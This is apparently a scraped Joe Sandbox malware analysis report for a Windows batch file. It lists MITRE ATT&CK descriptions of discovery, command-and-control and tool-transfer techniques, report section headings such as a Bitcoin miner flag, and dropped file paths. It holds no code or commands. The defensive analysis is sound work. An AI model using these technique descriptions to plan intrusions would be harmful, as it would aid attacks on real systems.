Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ceR3axDjok.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fuloniuf.ebl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbwhgkwf.v0p.psm1

C:\Users\user\Desktop\script.php

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Windows Analysis Report
ceR3axDjok.bat